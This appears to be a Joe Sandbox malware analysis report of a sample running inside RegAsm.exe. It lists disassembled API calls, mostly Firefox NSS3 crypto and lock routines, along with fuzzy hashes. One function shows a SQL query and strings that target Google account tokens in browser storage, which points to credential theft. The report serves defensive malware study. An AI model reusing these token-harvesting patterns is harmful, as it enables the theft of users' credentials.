                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C944DFF
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C944E59
                                                                                  • Part of subcall function 6C92FAB0: free.MOZGLUE(?,-00000001,?,?,6C8CF673,00000000,00000000), ref: 6C92FAC7
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CA0300C,00000000), ref: 6C944EB8
                                                                                • SECOID_FindOID_Util.NSS3(?), ref: 6C944EFF
                                                                                • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C944F56
                                                                                • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C94521A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                • String ID:
                                                                                • API String ID: 1025791883-0
                                                                                • Opcode ID: dd7c5b4bd0947259143475ba2b87211731aa0a253aa908ec13cceea14355a80b
                                                                                • Instruction ID: 8b688557eb47cec83dbb2f11f4d5c3442b92395443e74c819ce4525011580121
                                                                                • Opcode Fuzzy Hash: dd7c5b4bd0947259143475ba2b87211731aa0a253aa908ec13cceea14355a80b
                                                                                • Instruction Fuzzy Hash: 7DF18D75E0020ACBDB08CF94D8407AEB7B6BF49358F258169D915AB781E735E981CF90
                                                                                APIs
                                                                                  • Part of subcall function 6C965B40: PR_GetIdentitiesLayer.NSS3 ref: 6C965B56
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C95CFFC
                                                                                  • Part of subcall function 6C999090: TlsGetValue.KERNEL32 ref: 6C9990AB
                                                                                  • Part of subcall function 6C999090: TlsGetValue.KERNEL32 ref: 6C9990C9
                                                                                  • Part of subcall function 6C999090: EnterCriticalSection.KERNEL32 ref: 6C9990E5
                                                                                  • Part of subcall function 6C999090: TlsGetValue.KERNEL32 ref: 6C999116
                                                                                  • Part of subcall function 6C999090: LeaveCriticalSection.KERNEL32 ref: 6C99913F
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C95D011
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C95D08E
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C95D109
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6C95D182
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C95D1B9
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C95D1D8
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C95D1EC
                                                                                • PR_GetCurrentThread.NSS3 ref: 6C95D224
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6C95D245
                                                                                • PR_SetError.NSS3(FFFFD036,00000000), ref: 6C95D270
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$CurrentEnterErrorExitThreadValue$CriticalSection$IdentitiesLayerLeave
                                                                                • String ID:
                                                                                • API String ID: 3829233501-0
                                                                                • Opcode ID: c4c7d2e10080350ae2f32ab8fc85787d226cd4a1f540aec3bbe7db99a0af9f38
                                                                                • Instruction ID: 8b4abcea925ff690fc860727692be9f5286f99abb2e7632a73f55f2306a451e6
                                                                                • Opcode Fuzzy Hash: c4c7d2e10080350ae2f32ab8fc85787d226cd4a1f540aec3bbe7db99a0af9f38
                                                                                • Instruction Fuzzy Hash: D7713BB28042159BEB14DF34DE807EA37B8AF2131CF984174ED055AB95D336CAB4C7A2
                                                                                APIs
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(6C942C2A), ref: 6C940C81
                                                                                  • Part of subcall function 6C92BE30: SECOID_FindOID_Util.NSS3(6C8E311B,00000000,?,6C8E311B,?), ref: 6C92BE44
                                                                                  • Part of subcall function 6C918500: SECOID_GetAlgorithmTag_Util.NSS3(6C9195DC,00000000,00000000,00000000,?,6C9195DC,00000000,00000000,?,6C8F7F4A,00000000,?,00000000,00000000), ref: 6C918517
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C940CC4
                                                                                  • Part of subcall function 6C92FAB0: free.MOZGLUE(?,-00000001,?,?,6C8CF673,00000000,00000000), ref: 6C92FAC7
                                                                                • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C940CD5
                                                                                • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C940D1D
                                                                                • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C940D3B
                                                                                • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C940D7D
                                                                                • free.MOZGLUE(00000000), ref: 6C940DB5
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C940DC1
                                                                                • free.MOZGLUE(00000000), ref: 6C940DF7
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C940E05
                                                                                • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C940E0F
                                                                                  • Part of subcall function 6C9195C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C8F7F4A,00000000,?,00000000,00000000), ref: 6C9195E0
                                                                                  • Part of subcall function 6C9195C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C8F7F4A,00000000,?,00000000,00000000), ref: 6C9195F5
                                                                                  • Part of subcall function 6C9195C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C919609
                                                                                  • Part of subcall function 6C9195C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C91961D
                                                                                  • Part of subcall function 6C9195C0: PK11_GetInternalSlot.NSS3 ref: 6C91970B
                                                                                  • Part of subcall function 6C9195C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C919756
                                                                                  • Part of subcall function 6C9195C0: PK11_GetIVLength.NSS3(?), ref: 6C919767
                                                                                  • Part of subcall function 6C9195C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C91977E
                                                                                  • Part of subcall function 6C9195C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C91978E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                • String ID:
                                                                                • API String ID: 3136566230-0
                                                                                • Opcode ID: 13597e1d95c746aad1868317f7da48f645a0c2c4c945fbbc8bb93e07b7741bfc
                                                                                • Instruction ID: 9f85d9393ad879e5ca22fee214712893ba5bf2a217ff3badb194ef0d2d4e6c98
                                                                                • Opcode Fuzzy Hash: 13597e1d95c746aad1868317f7da48f645a0c2c4c945fbbc8bb93e07b7741bfc
                                                                                • Instruction Fuzzy Hash: B641C4B1900355ABEB009F64DC45BAF7678EF2430CF148028ED195BB41E735EA58CBE2
                                                                                APIs
                                                                                • PR_NewLock.NSS3(00000001,00000000,6CA20148,?,6C8E6FEC), ref: 6C8D502A
                                                                                • PR_NewLock.NSS3(00000001,00000000,6CA20148,?,6C8E6FEC), ref: 6C8D5034
                                                                                • PL_NewHashTable.NSS3(00000000,6C92FE80,6C92FD30,6C97C350,00000000,00000000,00000001,00000000,6CA20148,?,6C8E6FEC), ref: 6C8D5055
                                                                                • PL_NewHashTable.NSS3(00000000,6C92FE80,6C92FD30,6C97C350,00000000,00000000,?,00000001,00000000,6CA20148,?,6C8E6FEC), ref: 6C8D506D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HashLockTable
                                                                                • String ID:
                                                                                • API String ID: 3862423791-0
                                                                                • Opcode ID: 99f2621e41b46d5b95ebc10444f0b3e76288a4d24e166a39681b9e3b0d1e4c02
                                                                                • Instruction ID: 9184d5b9bb987e4632c9128dc5bff1ae71aaa3b8929ee39e9a477e6b20e7968a
                                                                                • Opcode Fuzzy Hash: 99f2621e41b46d5b95ebc10444f0b3e76288a4d24e166a39681b9e3b0d1e4c02
                                                                                • Instruction Fuzzy Hash: AA31A3B1A413219BEF349E259E2CB977678DB12708F06C626E909C7641E378E806CBD1
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmp
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                • String ID:
                                                                                • API String ID: 1192971331-0
                                                                                • Opcode ID: 26a841516b2f4547d8829a6a5cab6f5421adebcecc466603885578b0bf51e4a7
                                                                                • Instruction ID: 46bb30919189677b514f0bed6d042e62c1ca3f2b993960108de70ca43c4b875c
                                                                                • Opcode Fuzzy Hash: 26a841516b2f4547d8829a6a5cab6f5421adebcecc466603885578b0bf51e4a7
                                                                                • Instruction Fuzzy Hash: AF312FB1904B058FDB20AFBDD64826EBBF0BF85319F01593DE98997251EB749448CB82
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00407ECC
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004080EE
                                                                                  • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00408113
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004081FD
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00408211
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                  • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                  • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                  • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                • API String ID: 832884763-1713091031
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C872F3D
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6C872FB9
                                                                                • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C873005
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6C8730EE
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C873131
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C873178
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memsetsqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 984749767-598938438
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
                                                                                • String ID: 0123456789ABCDEF
                                                                                • API String ID: 1978830238-2554083253
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_DigestInit), ref: 6C906C66
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C906C94
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C906CA3
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C906CB9
                                                                                • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C906CD5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                • API String ID: 1003633598-3690128261
                                                                                APIs
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,6C8D7D8F,6C8D7D8F,?,?), ref: 6C8D6DC8
                                                                                  • Part of subcall function 6C92FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C92FE08
                                                                                  • Part of subcall function 6C92FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C92FE1D
                                                                                  • Part of subcall function 6C92FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C92FE62
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C8D7D8F,?,?), ref: 6C8D6DD5
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9F8FA0,00000000,?,?,?,?,6C8D7D8F,?,?), ref: 6C8D6DF7
                                                                                  • Part of subcall function 6C92B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA018D0,?), ref: 6C92B095
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C8D6E35
                                                                                  • Part of subcall function 6C92FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C92FE29
                                                                                  • Part of subcall function 6C92FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C92FE3D
                                                                                  • Part of subcall function 6C92FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C92FE6F
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C8D6E4C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93116E
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9F8FE0,00000000), ref: 6C8D6E82
                                                                                  • Part of subcall function 6C8D6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C8DB21D,00000000,00000000,6C8DB219,?,6C8D6BFB,00000000,?,00000000,00000000,?,?,?,6C8DB21D), ref: 6C8D6B01
                                                                                  • Part of subcall function 6C8D6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C8D6B8A
                                                                                • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C8D6F1E
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C8D6F35
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C9F8FE0,00000000), ref: 6C8D6F6B
                                                                                • PR_SetError.NSS3(FFFFE005,00000000,6C8D7D8F,?,?), ref: 6C8D6FE1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 587344769-0
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE10
                                                                                • EnterCriticalSection.KERNEL32(?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE24
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,6C8FD079,00000000,00000001), ref: 6C91AE5A
                                                                                • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE6F
                                                                                • free.MOZGLUE(85145F8B,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE7F
                                                                                • TlsGetValue.KERNEL32(?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AEB1
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AEC9
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AEF1
                                                                                • free.MOZGLUE(6C8FCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8FCDBB,?), ref: 6C91AF0B
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AF30
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                • String ID:
                                                                                • API String ID: 161582014-0
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C8FAB7F,?,00000000,?), ref: 6C8F4CB4
                                                                                • EnterCriticalSection.KERNEL32(0000001C,?,6C8FAB7F,?,00000000,?), ref: 6C8F4CC8
                                                                                • TlsGetValue.KERNEL32(?,6C8FAB7F,?,00000000,?), ref: 6C8F4CE0
                                                                                • EnterCriticalSection.KERNEL32(?,?,6C8FAB7F,?,00000000,?), ref: 6C8F4CF4
                                                                                • PL_HashTableLookup.NSS3(?,?,?,6C8FAB7F,?,00000000,?), ref: 6C8F4D03
                                                                                • PR_Unlock.NSS3(?,00000000,?), ref: 6C8F4D10
                                                                                  • Part of subcall function 6C97DD70: TlsGetValue.KERNEL32 ref: 6C97DD8C
                                                                                  • Part of subcall function 6C97DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C97DDB4
                                                                                • PR_Now.NSS3(?,00000000,?), ref: 6C8F4D26
                                                                                  • Part of subcall function 6C999DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DC6
                                                                                  • Part of subcall function 6C999DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9E0A27), ref: 6C999DD1
                                                                                  • Part of subcall function 6C999DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C999DED
                                                                                • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C8F4D98
                                                                                • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C8F4DDA
                                                                                • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C8F4E02
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 4032354334-0
                                                                                • Opcode ID: d03f4c27305764faf339c34fb8043c76e0caca829f75f53e4e58896bd3ca2bef
                                                                                • Instruction ID: 5e037ccc5f274ba629dbb7837187e0283639d4d35ea1e578c86ed74438d688c3
                                                                                • Opcode Fuzzy Hash: d03f4c27305764faf339c34fb8043c76e0caca829f75f53e4e58896bd3ca2bef
                                                                                • Instruction Fuzzy Hash: AB41F9B5A002059BEB206F28EF409A677B8EF9A25DF054971EC18C7B12FB31D915C7E1
                                                                                APIs
                                                                                • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C8D2CDA,?,00000000), ref: 6C8D2E1E
                                                                                  • Part of subcall function 6C92FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C8D9003,?), ref: 6C92FD91
                                                                                  • Part of subcall function 6C92FD80: PORT_Alloc_Util.NSS3(A4686C93,?), ref: 6C92FDA2
                                                                                  • Part of subcall function 6C92FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C93,?,?), ref: 6C92FDC4
                                                                                • SECITEM_DupItem_Util.NSS3(?), ref: 6C8D2E33
                                                                                  • Part of subcall function 6C92FD80: free.MOZGLUE(00000000,?,?), ref: 6C92FDD1
                                                                                • TlsGetValue.KERNEL32 ref: 6C8D2E4E
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6C8D2E5E
                                                                                • PL_HashTableLookup.NSS3(?), ref: 6C8D2E71
                                                                                • PL_HashTableRemove.NSS3(?), ref: 6C8D2E84
                                                                                • PL_HashTableAdd.NSS3(?,00000000), ref: 6C8D2E96
                                                                                • PR_Unlock.NSS3 ref: 6C8D2EA9
                                                                                • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8D2EB6
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C8D2EC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                • String ID:
                                                                                • API String ID: 3332421221-0
                                                                                • Opcode ID: 20b5f8396f51f1ef8bf0f4ba5998784b6f83f6acbc3ba4ada33b989b8559e0cb
